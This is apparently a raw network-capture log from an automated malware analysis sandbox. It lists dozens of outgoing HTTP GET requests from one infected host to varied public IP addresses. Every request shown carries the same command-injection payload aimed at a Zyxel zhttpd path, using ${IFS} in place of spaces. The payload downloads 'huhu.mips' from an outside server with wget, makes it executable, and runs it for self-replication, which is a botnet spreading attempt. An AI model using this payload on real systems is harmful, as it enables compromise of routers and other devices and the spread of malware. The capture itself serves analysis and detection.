                                                      Feb 2, 2024 06:35:55.686353922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5154192.168.2.1437618110.105.24.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686377048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5155192.168.2.144062269.43.226.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686424971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5156192.168.2.1450728125.127.206.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686485052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5157192.168.2.145912470.205.215.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686516047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5158192.168.2.144370885.235.7.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686538935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5159192.168.2.1438578197.247.42.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686604023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5160192.168.2.145365099.231.186.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686645031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5161192.168.2.1434364175.117.80.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686670065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5162192.168.2.14515924.78.94.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686726093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5163192.168.2.14373564.200.44.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686753035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5164192.168.2.1449474113.247.7.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686800957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5165192.168.2.1449690153.228.54.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686842918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5166192.168.2.145418462.228.237.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686866999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5167192.168.2.1449062132.37.244.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686924934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5168192.168.2.1460748217.178.38.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686966896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5169192.168.2.1454024206.109.36.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687001944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5170192.168.2.1445528212.163.9.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687042952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5171192.168.2.1455074167.74.250.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687068939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5172192.168.2.1448016121.176.34.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687120914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5173192.168.2.1450542129.240.124.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687141895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5174192.168.2.144548660.33.148.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687196970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5175192.168.2.144229067.95.121.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687232018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5176192.168.2.1434836176.164.26.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687268972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5177192.168.2.144604087.225.151.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687299967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5178192.168.2.1460898164.147.82.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687345028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5179192.168.2.1434224101.81.248.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.687391996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5180192.168.2.144257425.133.157.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700592995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5181192.168.2.145705687.98.181.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700639009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5182192.168.2.145931269.158.20.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700654030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5183192.168.2.145248895.29.229.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700711966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5184192.168.2.1453104139.149.67.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700764894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5185192.168.2.1444454134.23.192.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700797081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5186192.168.2.1453792171.14.110.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700834036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5187192.168.2.1448758163.178.152.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700870991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5188192.168.2.1432908156.31.234.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700911045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5189192.168.2.144002618.94.51.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700937033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5190192.168.2.1457946222.242.131.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.700989962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5191192.168.2.1456516136.73.194.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701023102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5192192.168.2.1452084120.21.227.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701071978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5193192.168.2.1459988136.187.40.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701112986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5194192.168.2.1435866195.64.159.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701168060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5195192.168.2.143376058.83.101.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701210022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5196192.168.2.145577252.180.92.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701248884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5197192.168.2.145675854.68.129.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701291084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5198192.168.2.145061062.106.225.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701328993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5199192.168.2.1451106164.151.36.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701378107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5200192.168.2.1450178118.176.8.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701410055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5201192.168.2.1456464139.27.172.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701462984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5202192.168.2.1450636134.201.89.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701507092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5203192.168.2.145158454.201.37.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701535940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5204192.168.2.145855873.120.212.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701595068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5205192.168.2.1451876101.132.69.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701622009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5206192.168.2.1458870151.175.195.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701709986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5207192.168.2.145900072.60.245.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701746941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5208192.168.2.1437454187.150.128.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701771975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5209192.168.2.1452022216.133.117.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701809883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5210192.168.2.1445964202.184.164.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701842070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5211192.168.2.1453244159.213.121.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701904058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5212192.168.2.1447924211.75.159.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701931000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5213192.168.2.1452982103.241.122.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.701963902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5214192.168.2.143721068.123.215.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702025890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5215192.168.2.143927025.77.209.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702060938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5216192.168.2.14402144.39.206.146443
                                                      TimestampBytes transferredDirectionData
